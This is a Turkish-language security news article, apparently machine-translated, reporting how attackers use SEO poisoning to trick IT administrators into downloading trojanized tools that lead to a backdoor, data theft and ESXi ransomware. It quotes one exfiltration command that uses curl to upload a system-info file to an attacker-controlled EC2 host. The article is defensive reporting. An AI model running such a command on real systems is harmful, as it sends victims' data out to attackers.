Siber güvenlik uzmanları, arama motoru optimizasyonu (SEO) zehirleme taktikleri aracılığıyla BT yöneticilerini hedefleyen sofistike bir saldırı kampanyası ortaya çıkardılar.
Tehdit aktörleri, yaygın olarak kullanılan idari araçların kötü niyetli versiyonlarını arama motoru sonuçlarının en üstüne itmek için gelişmiş SEO tekniklerinden yararlanarak şüphesiz BT profesyonelleri için tehlikeli bir tuzak oluşturuyor.
Yöneticiler meşru araçları aradıklarında, otantik görünen ancak tüm kurumsal ağları tehlikeye atmak için tasarlanmış gizli kötü amaçlı yükler içeren silahlı sürümleri indirirler.
.png
)
Bu saldırılar, geleneksel kimlik avı kampanyalarından daha hedefli “sulama deliği” yaklaşımlarına doğru uzaklaşarak tehdit aktör metodolojisinde ilgili bir değişimi temsil ediyor.
Kötü niyetli yükler genellikle mağdurların aradığı meşru idari yazılımı, onu anında şüpheyi tetiklemeden komut ve kontrol kanalları oluşturan arka kapı kodunun yanında çalıştırır.
Bu ikili işlevsellik, yöneticiler sadece indirmeyi amaçladıkları araçları kullandıklarına inanırken kötü amaçlı yazılımların gizli modda çalışmasına izin verir.
Varonis araştırmacıları, SEO zehirlenmesinin bu saldırı vektörü yoluyla önemli ağ uzlaşmasına yol açtığı birden fazla vaka belirledi.
Tom Barnea ve Simon Biggs tarafından Varonis MDDR adli tıp ekibinden belgelenen özellikle şiddetli bir davada, bir alan yöneticisi, popüler bir VMware izleme yardımcı programı olan RV-Tools gibi görünen bir web sitesinden, arama sonuçlarının en üstünde görünmek için yapay olarak artırılan bir web sitesinden indirildi.
Saldırı zinciri, bir yönetici, tehlikeye atılmış veya kötü niyetli bir web sitesinden meşru yazılım gibi görünen şeyi indirip yürüttüğünde başlar.
Yürütme üzerine, kötü amaçlı yazılım, tehlikeye atılan cihaza kalıcı erişim sağlayan ek bileşenler dağıtır.
Belgelenen durumda, ilk erişim, saldırganlara ağda bir dayanak sağlayan Smokedham olarak bilinen PowerShell tabanlı bir .NET arka kapısının konuşlandırılmasına yol açtı.
İlk erişim belirlendikten sonra, saldırganlar çevre hakkında bilgi toplamak için bir dizi sistem komutu aracılığıyla keşif yaparlar.
Komut çıkışı tipik olarak gizli bir konuma kaydedilir ve saldırgan kontrollü altyapıya eklenir.
Saldırı akışı
Gözlenen saldırıda, tehdit aktörleri sistem verilerini aşağıdakiler gibi curl komutları kullanarak PNG görüntü dosyaları olarak gizlenmiş bir Amazon EC2 örneğine yükledi:–
curl - F " data=@ C:\ProgramData\sysinfo. txt" http://attacker-controlled-ec2.amazonaws.com/upload. php.webp)
Saldırganların kalıcılık mekanizması, zararsız isimler altında ek uzaktan erişim araçlarının dağıtılmasını içerir.
Belgelenen durumda, tehdit oyuncusu SSH tünelleri oluşturmak için Kickidler (“Grabber.exe” olarak yeniden adlandırılan) ve Kitty (“Fork.exe” olarak yeniden adlandırılan) adlı bir çalışan izleme yazılımı kurdu.
Bu araçlar, ilk arka kapı keşfedilmiş ve kaldırılmış olsa bile erişimi sürdürmelerine izin verdi.
Kalıcılık oluşturduktan sonra, saldırganlar yanal harekete başlamadan önce genellikle birkaç gün boyunca aktiviteyi duraklatırlar.
Bu duraklama birden fazla amaca hizmet edebilir: kimlik bilgisi hasat için zaman ayırma, şüpheli etkinlik kalıpları arayan güvenlik araçlarının algılanmasını önleme veya otomatik başlangıç uzlaşması ile insan tarafından işletilen takip eylemleri arasında bir elde tutmayı yansıtma.
Bu saldırıların sonucu genellikle kuruluşlar için felakettir. Varonis tarafından incelenen durumda, saldırganlar, ESXI sunucularında şifreleyen fidye yazılımlarını (VMDKS) dağıtarak önemli iş engellerine neden olan dosya aktarım yardımcı programı WINSCP’yi kullanarak neredeyse terabayt hassas verileri ortadan kaldırdılar.
Kuruluşlar, katı uygulama beyaz listesi uygulayarak, olağandışı yönetici faaliyetlerini izleyerek, uzaktan erişim protokollerini kısıtlayarak ve idari kamu hizmetlerini sık sık indiren BT personeli için özel güvenlik bilinci eğitimi sağlayarak kendilerini koruyabilir.
Are you from the SOC and DFIR Teams? – Analyse Real time Malware Incidents with ANY.RUN -> Start Now for Free.